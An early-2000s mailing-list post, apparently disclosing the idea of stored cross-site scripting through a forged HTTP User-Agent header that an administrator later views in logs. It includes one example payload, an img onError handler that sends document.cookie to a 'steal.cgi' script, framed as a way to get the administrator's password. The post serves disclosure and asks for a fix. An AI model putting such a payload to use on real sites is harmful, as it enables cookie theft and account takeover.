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XSS And Headers...

From: "lok lok" <itslok () hotmail com>
Date: Sat, 25 May 2002 14:01:10 +1000

There used to be alot of discussion about XSS, cross-site scripting where you can insert html into pages that are viewed by many ppl and steal info...

most of these sites (e.g. a bulletin board) have been updated to protect this behaviour...

however, i've noticed that many do not cover headers..


HTTP_USER_AGENT may be logged or stored somewhere when you sign-up to website "abc". The administrator, or whoever will check over your account and see your browser type...

normally it would contain something like... Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)

but with a proxy prog (i use proxomitron) you can change it to whatever you like..

for example: <img src="x.jpg" onError="this.src='steal.cgi?document.cookie';">

and if the site logs it, you just got the administrators password:)

Now, im yet to come across any sites that this works on because i just thought of it this afternoon but let me know if it works:) in any case, a lot of sites would log/store this kind of information so it should be fixed.

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